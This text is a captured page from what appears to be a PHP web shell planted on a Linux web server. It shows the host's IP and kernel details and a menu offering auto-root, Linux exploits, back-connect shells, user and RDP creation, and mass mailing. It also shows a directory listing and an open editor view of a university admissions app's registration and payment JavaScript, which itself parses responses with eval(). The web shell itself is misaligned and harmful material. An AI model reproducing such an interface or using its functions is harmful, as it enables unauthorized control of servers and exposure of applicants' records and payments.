Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.137.164.200
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gach /
phdadm /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
MainPage.js
40.91
KB
-rwxr-xr-x
Registrationpage.js
5.04
KB
-rwxr-xr-x
admin.js
15.25
KB
-rwxr-xr-x
advanced-form-elements.js
5.41
KB
-rwxr-xr-x
appForm.js
13.62
KB
-rwxr-xr-x
appStatus.js
4.09
KB
-rwxr-xr-x
compressed.js
440.45
KB
-rwxr-xr-x
control.js
18.43
KB
-rwxr-xr-x
demo.js
3.33
KB
-rwxr-xr-x
forgot-password.js
3.24
KB
-rwxr-xr-x
form_submit.js
1.3
KB
-rwxr-xr-x
hallticket.js
409
B
-rwxr-xr-x
helpers.js
576
B
-rwxr-xr-x
kusPhdAdm.js
16.17
KB
-rwxr-xr-x
login.js
1.07
KB
-rwxr-xr-x
printCor.js
0
B
-rwxr-xr-x
script.js
3
B
-rwxr-xr-x
sign-in.js
2.63
KB
-rwxr-xr-x
sign-up.js
4.49
KB
-rwxr-xr-x
upload.js
5.59
KB
-rwxr-xr-x
validate.js
9.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Registrationpage.js
var studregno; //var $host_url="http://"+window.location.host+"/"+window.location.pathname.split('/')[1]+"/app.php?a="; var $host_url = "http://" + window.location.host + "/" + window.location.pathname.split('/')[1] + "/" + window.location.pathname.split('/')[2] + "/app.php?a="; function studentregno() { studregno = $('#studregno').val(); if (studregno === '') { $('#studregno_err').addClass('hasError'); return; } else { var datastring = "&studregno=" + studregno + "&page=registration"; $.ajax({ type: "POST", async: false, data: datastring, url: $host_url + 'getRerigistrationDetails', success: function getsubjectdetResponce(responce) { responce = eval('(' + responce + ')'); if (responce.error_code === -1) { alert(responce.data.msg); } else { window.location.href = "MainPage.html?page=registration"; } } }); } } function getreprint() { var rappno = $('#rappno').val(); var rdob = $('#rdob').val(); var datastring = "&rappno=" + rappno + "&rdob=" + rdob; $.ajax({ type: "POST", url: $host_url + 'getreprint', data: datastring, success: function (responce) { responce = eval('(' + responce + ')'); if (responce.error_code == 0) { if (responce.data.html.fpaymentstatus == 'success') { window.location.href = $host_url + "PrintApplicationFormSBM&app_no=" + rappno; } else { alert('Payment Not Made.'); return; } } else { alert('Invalid Details.'); return; } } }); } function PrintApplicationFormNETBANKING(rappno) { window.location.href = $host_url + "PrintApplicationFormSBM&app_no=" + rappno; } function makepayment() { var rappno = $('#rappno').val(); // console.log(rappno); $.ajax({ type: "POST", url: $host_url + 'masbankdet', success: function (responce) { responce = eval('(' + responce + ')'); if (responce.error_code == 0) { var button = ''; $.ajax({ type: "POST", async: false, data: "appno=" + rappno + "&funivcode=" + '041', url: "razorpay/pay.php", success: function (responce) { button = responce; } }); var table = `<table class="payment" width = "60%" border = "1" cellspacing="0" cellpadding="5" style = "margin:1% auto;"> <thead> <th style = "text-align: center;width = 20%;"> Logo </th> <th style = "text-align: center;width = 20%;" > Action </th> </thead> <tbody>`; var masbank = responce.data['masbank']; for (var i = 0; i < masbank.length; i++) { table += `<tr> <td width = "12%;" style = "text-align: center;"> <img height="60" width="150" src = "${masbank[i]['fbanklog']}" /> </td>`; if (masbank[i]['fbank'] == 'razorpay') { table += `<td width = "20%;"> <center>${button}</center> </td>`; } else { table += `<td width = "20%;" > <center><span class="button" onclick="makepaymentdet('${masbank[i]['fbank']}','${rappno}','${masbank[i]['funivcode']}')">Make Payment</span></center> </td> </tr>`; } } $('#bankdet').show(); $('#bankdet').html(table); return; } } }); //window.location.href="Paytm/pgRedirect.php?productinfo="+rappno; } function makepaymentdet(payment, id, funivcode) { if (payment == 'paytm') window.location.href = "Paytm/pgRedirect.php?productinfo=" + id + "&funivcode=" + funivcode; if (payment == 'axis') window.location.href = "axis/sampleEasyPay.php?productinfo=" + id + "&funivcode=" + funivcode; if (payment == 'hdfc') { window.location.href = "hdfc/ccavRequestHandler.php?productinfo=" + id + "&funivcode=" + funivcode; } } function downloadAttachment() { if (trim($('#rappno').val()) == '') { alert("Enter Application No."); $("#rappno").focus(); return; } if (trim($('#rdob').val()) == '') { alert("Enter date of birth"); $("#rdob").focus(); return; } var datastring = "&rappno=" + $('#rappno').val() + "&rdob=" + $('#rdob').val(); $.ajax({ type: "POST", url: $host_url + "checkForAttachments", data: datastring, success: checkForAttachmentsSuccess }); } function checkForAttachmentsSuccess(responce) { responce = eval('(' + responce + ')'); if (responce.error_code == -1) { alert('No details found for given data'); return false; } else window.location.href = $host_url + "downloadAllStudentPhotos.demo&college_from=" + $('#college_from').val() + "&college_to=" + $('#college_to').val() + "°ree_from=" + $('#degree_from').val() + "°ree_to=" + $('#degree_to').val(); }
Close